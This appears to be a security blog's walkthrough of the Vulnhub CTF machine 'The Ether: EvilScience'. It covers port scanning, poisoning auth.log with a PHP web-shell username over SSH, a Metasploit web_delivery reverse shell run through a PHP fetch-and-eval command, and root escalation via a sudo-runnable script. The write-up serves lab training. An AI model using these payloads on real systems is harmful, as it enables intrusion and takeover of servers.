It's all about digital security.

A simple blog where you can find different things about digital security.

The Ether: CTF walkthrough


Name: The Ether: EvilScience
Date release: 26 Oct 2017

SeriesThe Ether
Web page

Note, the VM from Vulnhub have an issue. You have to download the VM from this updated link (from the author website): here



We use arp-scan to find the IP address of the VM.


Then, we scans the VM to find open ports and running services.

root@kali:~# nmap -A -F

Starting Nmap 7.60 ( ) at 2017-11-26 13:04 CET
Nmap scan report for theether-1.home (
Host is up (0.00074s latency).
Not shown: 98 closed ports
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 12:09:bc:b1:5c:c9:bd:c3:ca:0f:b1:d5:c3:7d:98:1e (RSA)
|   256 de:77:4d:81:a0:93:da:00:53:3d:4a:30:bd:7e:35:7d (ECDSA)
|_  256 86:6c:7c:4b:04:7e:57:4f:68:16:a9:74:4c:0d:2f:56 (EdDSA)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: The Ether
MAC Address: 00:0C:29:44:E7:CF (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1   0.74 ms theether-1.home (

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 10.61 seconds

Remote commands execution

After few scan and some research with the OWASP-Zap tool I found that we are able to read the content of the auth.log file where are stored SSH connections information.


We can poisoned this log file with this following connection attempt.

root@kali:~# ssh '<?php echo system($_GET['c']);?>'@
<?php echo system($_GET[c]);?>@'s password: 
Permission denied, please try again.
<?php echo system($_GET[c]);?>@'s password: 
Permission denied, please try again.
<?php echo system($_GET[c]);?>@'s password: 
<?php echo system($_GET[c]);?>@ Permission denied (publickey,password).

Then, to check if we have an RCE we can execute this query.

root@kali:~# curl '' -s | head

Nov 26 05:04:53 theEther sshd[2024]: Invalid user about.php
research.php from
Nov 26 05:04:53 theEther sshd[2024]: input_userauth_request: invalid user about.php
(23) Failed writing body

From RCE to reverse shell

For this CTF I will use the web_delivery exploit from the Metasploit Framework.

root@kali:~# msfconsole -q -x 'use exploit/multi/script/web_delivery'
msf exploit(web_delivery) > show options 

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST          yes       The local host to listen on. This must be an address on the local machine or
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Python

msf exploit(web_delivery) >

I changed the SRVPORT (default 8080 is used by OWASP-Zap), the PAYLOAD (PHP instead of Python), the LHOST and the TARGET (for a PHP payload) parameters.

msf exploit(web_delivery) > set TARGET 1
msf exploit(web_delivery) > set LHOST
msf exploit(web_delivery) > set SRVPORT 9090
SRVPORT => 9090
msf exploit(web_delivery) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(web_delivery) > run 
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 
msf exploit(web_delivery) > [*] Using URL:
[*] Local IP:
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents(''));"

msf exploit(web_delivery) >

Finally, we execute the PHP command to gain a reverse shell.

root@kali:~# python 
Python 2.7.14 (default, Sep 17 2017, 18:50:44) 
[GCC 7.2.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import requests
>>> url = ''' -d allow_url_fopen=true -r "eval(file_get_contents(''));"'''
>>> resp = requests.get(url)

Let’s get a TTY with low privilege.


Privilege escalation

A weird python script can be found in the /var/www/html/ directory.

bash-4.3$ ls -la
ls -la
total 11312
drwxrwxr-x 4 root www-data        4096 Nov 23 19:44 .
drwxr-xr-x 5 root root            4096 Oct 23 18:31 ..
-rwxrwxr-x 1 root www-data        5891 Oct 23 19:27 about.php
drwxrwxr-x 3 root www-data        4096 Oct 23 18:02 images
-rwxrwxr-x 1 root www-data        6495 Oct 23 20:48 index.php
drwxrwxr-x 4 root www-data        4096 Oct 23 18:02 layout
-rwxrwxr-x 1 root www-data        5006 Oct 23 18:02 licence.txt
-rwxrwxr-x 1 root www-data       10641 Oct 23 19:26 research.php
-rwsrwsr-x 1 root evilscience 11527272 Nov 23 19:41

Moreover, we can execute this script with root privilege without password.


Plus, this script execute the cat command, so we are able to run any commands we want with root privilege.


We upload and we execute a reverse shell on the system.


We read the flag hidden in a PNG file.


Finally, we decode the base64 flag.